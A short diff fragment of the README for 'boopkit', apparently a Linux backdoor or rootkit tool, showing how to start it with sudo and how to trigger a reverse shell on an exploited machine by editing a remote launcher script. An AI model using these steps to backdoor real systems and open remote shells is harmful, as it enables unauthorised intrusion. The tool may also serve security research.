krisnova/boopkit/README.md

 sudo ./boopkit > /var/log/boop.log &
 ```

 Trigger a reverse shell over an existing TCP service.
+Edit the `remote` launcher script and point it at any TCP server running on the exploited machine!

 ```
 # edit ./remote/remote as needed